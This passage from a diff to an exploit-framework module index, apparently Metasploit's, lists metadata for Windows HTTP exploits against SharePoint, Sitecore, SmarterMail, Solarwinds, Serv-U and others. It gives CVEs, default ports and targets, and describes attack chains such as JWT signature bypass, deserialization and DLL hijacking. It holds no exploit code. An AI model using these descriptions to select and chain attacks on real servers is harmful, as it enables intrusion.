"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php", + "URL-https://blogs.securiteam.com/index.php/archives/3094" + ], + "platform": "Windows", + "arch": "", + "rport": 23423, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/serviio_checkstreamurl_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/servu_session_cookie": { + "name": "Rhinosoft Serv-U Session Cookie Buffer Overflow", + "fullname": "exploit/windows/http/servu_session_cookie", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-01", + "type": "exploit", + "author": [ + "Nikolas Rangos ", + "M.Yanagishita ", + "jduck " + ], + "description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-4006", + "OSVDB-59772", + "URL-http://rangos.de/ServU-ADV.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 SP2 English (NX)", + "Windows 2000 SP4 and XP SP3 English (SEH)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/servu_session_cookie.rb", + "is_install_path": true, + "ref_name": "windows/http/servu_session_cookie", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_data_deserialization": { + "name": "SharePoint DataSet / DataTable Deserialization", + "fullname": "exploit/windows/http/sharepoint_data_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-07-14", + "type": "exploit", + "author": [ + "Steven Seeley", + "Soroush Dalili", + "Spencer McIntyre" + ], + "description": "A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated\n attacker to execute code within the context of the SharePoint application service. The privileges in this\n execution context are determined by the account that is specified when SharePoint is installed and configured.\n The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe\n deserialization operation that can be triggered from a page that initializes either the\n ContactLinksSuggestionsMicroView type or a derivative of it. In a default configuration, a Domain User account\n is sufficient to access SharePoint and exploit this vulnerability.", + "references": [ + "CVE-2020-1147", + "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/sharepoint_data_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_data_deserialization", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce": { + "name": "Sharepoint Dynamic Proxy Generator Unauth RCE", + "fullname": "exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-01", + "type": "exploit", + "author": [ + "Jang", + "jheysel-r7" + ], + "description": "This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched\n in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.\n\n The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the\n signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. If the signing\n algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic\n flaw in the ReadTokenCore() method.\n\n After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to\n exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to\n replace the \"/BusinessDataMetadataCatalog/BDCMetadata.bdcm\" file in the webroot directory with a payload. The\n payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.", + "references": [ + "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-may-9-2023-kb5002389-e2b77a46-2946-495f-8948-8abdc44aacc3", + "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-june-13-2023-kb5002402-c5d58925-f7be-4d16-a61b-8ce871bbe34d", + "URL-https://testbnull.medium.com/p2o-vancouver-2023-v%C3%A0i-d%C3%B2ng-v%E1%BB%81-sharepoint-pre-auth-rce-chain-cve-2023-29357-cve-2023-24955-ed97dcab131e", + "CVE-2023-29357", + "CVE-2023-24955" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-02-15 09:26:54 +0000", + "path": "/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/sharepoint_ssi_viewstate": { + "name": "Microsoft SharePoint Server-Side Include and ViewState RCE", + "fullname": "exploit/windows/http/sharepoint_ssi_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-13", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.", + "references": [ + "CVE-2020-16952", + "URL-https://srcincite.io/advisories/src-2020-0022/", + "URL-https://srcincite.io/pocs/cve-2020-16952.py.txt", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_ssi_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_unsafe_control": { + "name": "Microsoft SharePoint Unsafe Control and ViewState RCE", + "fullname": "exploit/windows/http/sharepoint_unsafe_control", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-05-11", + "type": "exploit", + "author": [ + "Unknown", + "Spencer McIntyre", + "wvu " + ], + "description": "The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This\n can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will\n leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution\n when deserialized.\n\n Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.", + "references": [ + "CVE-2021-31181", + "ZDI-21-573", + "URL-https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_unsafe_control", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_workflows_xoml": { + "name": "SharePoint Workflows XOML Injection", + "fullname": "exploit/windows/http/sharepoint_workflows_xoml", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-03-02", + "type": "exploit", + "author": [ + "Spencer McIntyre", + "Soroush Dalili" + ], + "description": "This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.", + "references": [ + "CVE-2020-0646", + "URL-https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_workflows_xoml", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/shoutcast_format": { + "name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow", + "fullname": "exploit/windows/http/shoutcast_format", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-12-23", + "type": "exploit", + "author": [ + "MC ", + "mandragore " + ], + "description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.", + "references": [ + "CVE-2004-1373", + "OSVDB-12585", + "BID-12096" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows NT SP5/SP6a English", + "Windows 2000 English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/shoutcast_format.rb", + "is_install_path": true, + "ref_name": "windows/http/shoutcast_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/shttpd_post": { + "name": "SHTTPD URI-Encoded POST Request Overflow", + "fullname": "exploit/windows/http/shttpd_post", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-10-06", + "type": "exploit", + "author": [ + "LMH ", + "hdm ", + "skOd" + ], + "description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. Based on an original exploit by skOd\n but using a different method found by hdm.", + "references": [ + "CVE-2006-5216", + "OSVDB-29565", + "URL-http://shttpd.sourceforge.net", + "BID-20393" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT English SP5-SP6", + "Windows 2000 Spanish SP4", + "Windows 2000 French SP4", + "Windows 2000 English SP0-SP4", + "Windows 2000 French SP0-SP4", + "Windows 2003 Server English SP0-SP1", + "Windows XP German SP2", + "Windows XP German SP1", + "Windows XP English SP2", + "Windows XP English SP0-SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/shttpd_post.rb", + "is_install_path": true, + "ref_name": "windows/http/shttpd_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sitecore_xp_cve_2021_42237": { + "name": "Sitecore Experience Platform (XP) PreAuth Deserialization RCE", + "fullname": "exploit/windows/http/sitecore_xp_cve_2021_42237", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-11-02", + "type": "exploit", + "author": [ + "AssetNote", + "gwillcox-r7" + ], + "description": "This module exploits a deserialization vulnerability in the Report.ashx page\n of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.\n Versions 7.2.6 and earlier and 9.0 and later are not affected.\n\n The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll\n under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()\n handler that calls ProcessReport() with the context of the attacker's request without properly\n checking if the attacker is authenticated or not.\n\n This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will\n end up calling the DeserializeParameters() function of\n Sitecore.Analytics.Reporting.ReportDataSerializer, if a \"parameters\" XML tag is found in\n the attacker's request.\n\n Then for each subelement named \"parameter\", the code will check that it has a name and\n if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is\n vulnerable to deserialization attacks and can be trivially exploited by using the\n TypeConfuseDelegate gadget chain.\n\n By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user\n that IIS is running as, aka NT AUTHORITY\\NETWORK SERVICE. Users can then use technique 4\n of the \"getsystem\" command to use RPCSS impersonation and get SYSTEM level code execution.", + "references": [ + "CVE-2021-42237", + "URL-https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-11-11 23:56:11 +0000", + "path": "/modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb", + "is_install_path": true, + "ref_name": "windows/http/sitecore_xp_cve_2021_42237", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sitecore_xp_cve_2025_27218": { + "name": "Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit", + "fullname": "exploit/windows/http/sitecore_xp_cve_2025_27218", + "aliases": [], + "rank": 600, + "disclosure_date": "2025-01-06", + "type": "exploit", + "author": [ + "Dylan Pindur", + "machang-r7" + ], + "description": "This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience\n Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.", + "references": [ + "CVE-2025-27218", + "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535", + "URL-https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218" + ], + "platform": "Windows", + "arch": "x86, x64, cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "PowerShell Stager" + ], + "mod_time": "2025-03-27 09:36:10 +0000", + "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb", + "is_install_path": true, + "ref_name": "windows/http/sitecore_xp_cve_2025_27218", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/smartermail_rce": { + "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution", + "fullname": "exploit/windows/http/smartermail_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-17", + "type": "exploit", + "author": [ + "Soroush Dalili", + "1F98D", + "Ismail E. Dawoodjee" + ], + "description": "This module exploits a vulnerability in the SmarterTools SmarterMail\n software for version numbers <= 16.x or for build numbers < 6985.\n The vulnerable versions and builds expose three .NET remoting endpoints\n on port 17001, namely /Servers, /Mail and /Spool. For example, a\n typical installation of SmarterMail Build 6970 will have the /Servers\n endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where\n serialized .NET commands can be sent through a TCP socket connection.\n\n The three endpoints perform deserialization of untrusted data\n (CVE-2019-7214), allowing an attacker to send arbitrary commands\n to be deserialized and executed. This module exploits this vulnerability\n to perform .NET deserialization attacks, allowing remote code execution\n for any unauthenticated user under the context of the SYSTEM account.\n Successful exploitation results in full administrative control of the\n target server under the NT AUTHORITY\\SYSTEM account.\n\n This vulnerability was patched in Build 6985, where the 17001 port is\n no longer publicly accessible, although it can be accessible locally\n at 127.0.0.1:17001. Hence, this would still allow for a privilege\n escalation vector if the server is compromised as a low-privileged user.", + "references": [ + "CVE-2019-7214", + "EDB-49216", + "URL-https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 9998, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "x86/x64 Windows CmdStager" + ], + "mod_time": "2023-07-09 07:25:09 +0000", + "path": "/modules/exploits/windows/http/smartermail_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/smartermail_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/softing_sis_rce": { + "name": "Softing Secure Integration Server v1.22 Remote Code Execution", + "fullname": "exploit/windows/http/softing_sis_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-07-27", + "type": "exploit", + "author": [ + "Chris Anastasio (muffin) of Incite Team", + "Steven Seeley (mr_me) of Incite Team", + "Imran E. Dawoodjee " + ], + "description": "This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.\n\n In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the \"restore configuration\" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.\n\n In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.\n\n The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.\n\n A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.", + "references": [ + "CVE-2022-1373", + "CVE-2022-2334", + "ZDI-22-1154", + "ZDI-22-1156", + "URL-https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html", + "URL-https://ide0x90.github.io/softing-sis-122-rce/" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8099, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-04-19 23:05:02 +0000", + "path": "/modules/exploits/windows/http/softing_sis_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/softing_sis_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/solarwinds_fsm_userlogin": { + "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", + "fullname": "exploit/windows/http/solarwinds_fsm_userlogin", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-13", + "type": "exploit", + "author": [ + "rgod", + "mr_me ", + "sinn3r " + ], + "description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.", + "references": [ + "CVE-2015-2284", + "OSVDB-81634", + "ZDI-15-107", + "URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip" + ], + "platform": "Windows", + "arch": "", + "rport": 48080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Solarwinds Firewall Security Manager 6.6.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb", + "is_install_path": true, + "ref_name": "windows/http/solarwinds_fsm_userlogin", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/solarwinds_storage_manager_sql": { + "name": "Solarwinds Storage Manager 5.1.0 SQL Injection", + "fullname": "exploit/windows/http/solarwinds_storage_manager_sql", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-12-07", + "type": "exploit", + "author": [ + "r ", + "muts", + "sinn3r " + ], + "description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.", + "references": [ + "OSVDB-81634", + "EDB-18818", + "URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html", + "URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb", + "is_install_path": true, + "ref_name": "windows/http/solarwinds_storage_manager_sql", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/sonicwall_scrutinizer_sqli": { + "name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection", + "fullname": "exploit/windows/http/sonicwall_scrutinizer_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-07-22", + "type": "exploit", + "author": [ + "muts", + "Devon Kearns", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. Please note that authentication is NOT needed\n to exploit this vulnerability.", + "references": [ + "CVE-2012-2962", + "OSVDB-84232", + "EDB-20033", + "BID-54625", + "URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Dell SonicWall Scrutinizer 9.5.1 or older" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb", + "is_install_path": true, + "ref_name": "windows/http/sonicwall_scrutinizer_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/ssrs_navcorrector_viewstate": { + "name": "SQL Server Reporting Services (SSRS) ViewState Deserialization", + "fullname": "exploit/windows/http/ssrs_navcorrector_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-02-11", + "type": "exploit", + "author": [ + "Soroush Dalili", + "Spencer McIntyre" + ], + "description": "A vulnerability exists within Microsoft's SQL Server Reporting Services\n which can allow an attacker to craft an HTTP POST request with a\n serialized object to achieve remote code execution. The vulnerability is\n due to the fact that the serialized blob is not signed by the server.", + "references": [ + "CVE-2020-0618", + "URL-https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)", + "Windows (cmd)" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/ssrs_navcorrector_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/steamcast_useragent": { + "name": "Streamcast HTTP User-Agent Buffer Overflow", + "fullname": "exploit/windows/http/steamcast_useragent", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-01-24", + "type": "exploit", + "author": [ + "LSO ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2008-0550", + "OSVDB-42670", + "URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt", + "BID-33898" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/steamcast_useragent.rb", + "is_install_path": true, + "ref_name": "windows/http/steamcast_useragent", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sws_connection_bof": { + "name": "Simple Web Server Connection Header Buffer Overflow", + "fullname": "exploit/windows/http/sws_connection_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-20", + "type": "exploit", + "author": [ + "mr.pr0n", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string data in the Connection Header to causes an overflow on the\n stack when function vsprintf() is used, and gain arbitrary code execution. The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.", + "references": [ + "OSVDB-84310", + "EDB-19937", + "URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sws_connection_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/sws_connection_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sybase_easerver": { + "name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow", + "fullname": "exploit/windows/http/sybase_easerver", + "aliases": [], + "rank": 